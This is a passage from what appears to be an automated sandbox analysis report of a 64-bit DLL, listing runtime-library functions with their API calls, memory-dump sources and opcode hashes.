                                                                                                                              • Opcode ID: 0a55f8eeb7806bba6c42ae5ee15134463014d09b4085e373e780df632001261e
                                                                                                                              • Instruction ID: 7b0d1d760ec28c0e3c70547b51e824b08e8e367aa93242f7b218232339b9c762
                                                                                                                              • Opcode Fuzzy Hash: 0a55f8eeb7806bba6c42ae5ee15134463014d09b4085e373e780df632001261e
                                                                                                                              • Instruction Fuzzy Hash: 05F0B721E2954286EF00EB79F8610B52364BF943C4F850132DA0E821E1EF3CE14B8628
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8055574 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 316COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                              • String ID: csm$csm$csm
                                                                                                                              • API String ID: 3523768491-393685449
                                                                                                                              • Opcode ID: 6f76826a600e321d57e1c0c385a0f334944fc3118040a4a9bf4bdfe818489ef3
                                                                                                                              • Instruction ID: 8790b03afb6520b0f5d339dc1116e09d4204ffcb0d15d8b1568ae5baa24cfef1
                                                                                                                              • Opcode Fuzzy Hash: 6f76826a600e321d57e1c0c385a0f334944fc3118040a4a9bf4bdfe818489ef3
                                                                                                                              • Instruction Fuzzy Hash: C2E18C72A08A828AEB209F68E4C13ED77A0EB44BD8F144135DB8D57696DF38F587C714
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8059EC0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF8B805A3E9,?,?,?,?,00007FF8B805A2A0), ref: 00007FF8B8059ECF
                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF8B805A3E9,?,?,?,?,00007FF8B805A2A0), ref: 00007FF8B8059F05
                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF8B805A3E9,?,?,?,?,00007FF8B805A2A0), ref: 00007FF8B8059F32
                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF8B805A3E9,?,?,?,?,00007FF8B805A2A0), ref: 00007FF8B8059F43
                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF8B805A3E9,?,?,?,?,00007FF8B805A2A0), ref: 00007FF8B8059F54
                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF8B805A3E9,?,?,?,?,00007FF8B805A2A0), ref: 00007FF8B8059F6F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2506987500-0
                                                                                                                              • Opcode ID: 011d52ea8c1e3757129978d92103697f82e6312d43f39c0d797ac5b728137382
                                                                                                                              • Instruction ID: adfcbe7d90ef45f98bc50ead99382895e84280031e0adecfb8e6196e6d74c790
                                                                                                                              • Opcode Fuzzy Hash: 011d52ea8c1e3757129978d92103697f82e6312d43f39c0d797ac5b728137382
                                                                                                                              • Instruction Fuzzy Hash: C8115C20A0D24242FE64A36DA6C61B972525F447F4F140635EB3E076DADF3CB4438728
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8053F3C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                              • String ID: csm$f
                                                                                                                              • API String ID: 2395640692-629598281
                                                                                                                              • Opcode ID: 4f1a14b1f65156831a7ea0633a015812b1fd38aea5ca1f1cfea4e3810dd66803
                                                                                                                              • Instruction ID: 7b6520b33a68233a4309c5c948332d547b7de04db828972297239119ef72b3a3
                                                                                                                              • Opcode Fuzzy Hash: 4f1a14b1f65156831a7ea0633a015812b1fd38aea5ca1f1cfea4e3810dd66803
                                                                                                                              • Instruction Fuzzy Hash: EB517072A09A028AEF14CB19E485AE92795FB50BD4F219530DB1E47B88DF39F843C718
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8058D48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                              • Opcode ID: 4fa7b2a0d1feff0e9dffb1760d7cf140f6ddeda683647f6b523a8cadb412e5ba
                                                                                                                              • Instruction ID: 1b0f52bbd9c51fc95d00f0de402002cd37abebe8d3ed4f13439e7ce8ae7ba606
                                                                                                                              • Opcode Fuzzy Hash: 4fa7b2a0d1feff0e9dffb1760d7cf140f6ddeda683647f6b523a8cadb412e5ba
                                                                                                                              • Instruction Fuzzy Hash: D3F04F61A19A0681FE148F68A8943BA6360AF857E1F550235CB6D456E8CF3CE44BC754
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B805496C Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AdjustPointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1740715915-0
                                                                                                                              • Opcode ID: 5429b3562918f5dd76d55c93c1532937604b90ba608a9ebeaa6dd5a2ee378f25
                                                                                                                              • Instruction ID: 62e238d2f48772f9d942e0457494b2e7fc21a77fd7d9f47a8fa2f49352d97b54
                                                                                                                              • Opcode Fuzzy Hash: 5429b3562918f5dd76d55c93c1532937604b90ba608a9ebeaa6dd5a2ee378f25
                                                                                                                              • Instruction Fuzzy Hash: E5B18EB1A0AE4281FE659A1994C22F966A4EF44BC4F098435DB4D077D9DF7CF453C328
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8060D44 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _set_statfp
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1156100317-0
                                                                                                                              • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                              • Instruction ID: c7ec88bda2c81705f4c5ff48c1244d7b0e390f9b8e78c782a1e712065b79c8c8
                                                                                                                              • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                              • Instruction Fuzzy Hash: 2B114F36EDCA1341FF54912CD84537A21456F553E4F084738EB6E266E78F3CB8438208
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8059F88 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF8B805848F,?,?,00000000,00007FF8B805872A,?,?,?,?,?,00007FF8B80586B6), ref: 00007FF8B8059FA7
                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF8B805848F,?,?,00000000,00007FF8B805872A,?,?,?,?,?,00007FF8B80586B6), ref: 00007FF8B8059FC6
                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF8B805848F,?,?,00000000,00007FF8B805872A,?,?,?,?,?,00007FF8B80586B6), ref: 00007FF8B8059FEE
                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF8B805848F,?,?,00000000,00007FF8B805872A,?,?,?,?,?,00007FF8B80586B6), ref: 00007FF8B8059FFF
                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF8B805848F,?,?,00000000,00007FF8B805872A,?,?,?,?,?,00007FF8B80586B6), ref: 00007FF8B805A010
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Value
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3702945584-0
                                                                                                                              • Opcode ID: 612452d8c52a45992ba15f8846080e423873e9d33e6f9e92b24908abcfe38f70
                                                                                                                              • Instruction ID: e307223b458cb6fa30a378f820eef292a547237d94bbb9ba536c2aea5e7a9a77
                                                                                                                              • Opcode Fuzzy Hash: 612452d8c52a45992ba15f8846080e423873e9d33e6f9e92b24908abcfe38f70
                                                                                                                              • Instruction Fuzzy Hash: 8F117C20F1C34641FE68A76DA5C22B932525F443E4F14573AEA2D06AD6DF3CF4435728
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8059E1C Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Value
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3702945584-0
                                                                                                                              • Opcode ID: 6c0cdb17b9ba0186326233d53c1d1d8203334392e611c029a2f99a525d632b43
                                                                                                                              • Instruction ID: 94e9045bb75502151d69b273e3b688d06b637654f7f19185a98a73c20c5b55ac
                                                                                                                              • Opcode Fuzzy Hash: 6c0cdb17b9ba0186326233d53c1d1d8203334392e611c029a2f99a525d632b43
                                                                                                                              • Instruction Fuzzy Hash: EF11E520A0D20701FE68A2AD64D61F932525F863E4F180B38DB3E0A3D2EF3CB5535628
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8055C8C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                              • String ID: MOC$RCC
                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                              • Opcode ID: 2b96f22bcf06260daa3efc4329e2a3a353743bae305958f5dd7e532f85404d9f
                                                                                                                              • Instruction ID: 2a983415adb82565d49385926ed53e9fc50c7ddf509c5ce6b900f7155644e2b6
                                                                                                                              • Opcode Fuzzy Hash: 2b96f22bcf06260daa3efc4329e2a3a353743bae305958f5dd7e532f85404d9f
                                                                                                                              • Instruction Fuzzy Hash: 2D919073A08B858AEB11CB68E4802ED7BA0FB457C8F144129EB4D17B95DF38E197C714
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8055A70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                              • String ID: MOC$RCC
                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                              • Opcode ID: fdcd16305045ec9e3a9ea81cb4fbc7a89fbcf5aad8e166889942dce779bbbd18
                                                                                                                              • Instruction ID: 95375745a42e8a6ac23e36c709c5a3c665ab293b11f91cdee480eb02efce3242
                                                                                                                              • Opcode Fuzzy Hash: fdcd16305045ec9e3a9ea81cb4fbc7a89fbcf5aad8e166889942dce779bbbd18
                                                                                                                              • Instruction Fuzzy Hash: 69613B76A08B458AEB108F69E4803ED7BA0FB44BC8F144225EF4D17B99DF78E196C714
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8056200 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                              • String ID: csm$csm
                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                              • Opcode ID: 7c663aa3d2baf14d9b1455fb2fe018f13fb3287d6d3f71b6e2d4d1bf4ac9b954
                                                                                                                              • Instruction ID: 5822973363550836a210200bafdc328024818662305bc0234c6f175860fa8ee0
                                                                                                                              • Opcode Fuzzy Hash: 7c663aa3d2baf14d9b1455fb2fe018f13fb3287d6d3f71b6e2d4d1bf4ac9b954
                                                                                                                              • Instruction Fuzzy Hash: F9515A3292868286EF648B19D5842A877A0FB45BD8F144135DBAD47BD5CF3CF493CB18
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B805EF58 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2718003287-0
                                                                                                                              • Opcode ID: 4656cb552085bff3b46a5aa1f894181aa0758d6cc93cd0807eff427b537bd41c
                                                                                                                              • Instruction ID: 02a7ce39010d610450bf82c9cb24a9858ff32d4c171abfdbd26e8de965eb9919
                                                                                                                              • Opcode Fuzzy Hash: 4656cb552085bff3b46a5aa1f894181aa0758d6cc93cd0807eff427b537bd41c
                                                                                                                              • Instruction Fuzzy Hash: C9D19872B18A8189EB11CB69D4802EC37A1EB44BD8F144236DF9D97BD9DB38E447C354
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B805F880 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8B805F86B), ref: 00007FF8B805F99C
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8B805F86B), ref: 00007FF8B805FA27
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 953036326-0
                                                                                                                              • Opcode ID: 581169c2c4f5539833ecfb97ba8190d70a0be7c33438e898026fa2a97b5e5328
                                                                                                                              • Instruction ID: 87dfdbbfc47e56d0ae58c182b132e3055e6495ed156699e2d235143f11ddc0d3
                                                                                                                              • Opcode Fuzzy Hash: 581169c2c4f5539833ecfb97ba8190d70a0be7c33438e898026fa2a97b5e5328
                                                                                                                              • Instruction Fuzzy Hash: BB918C62A0865295FB609B6994806FD2BA0AB44BC8F144139DF0E57AD4DF3CE483C729
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8056438 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
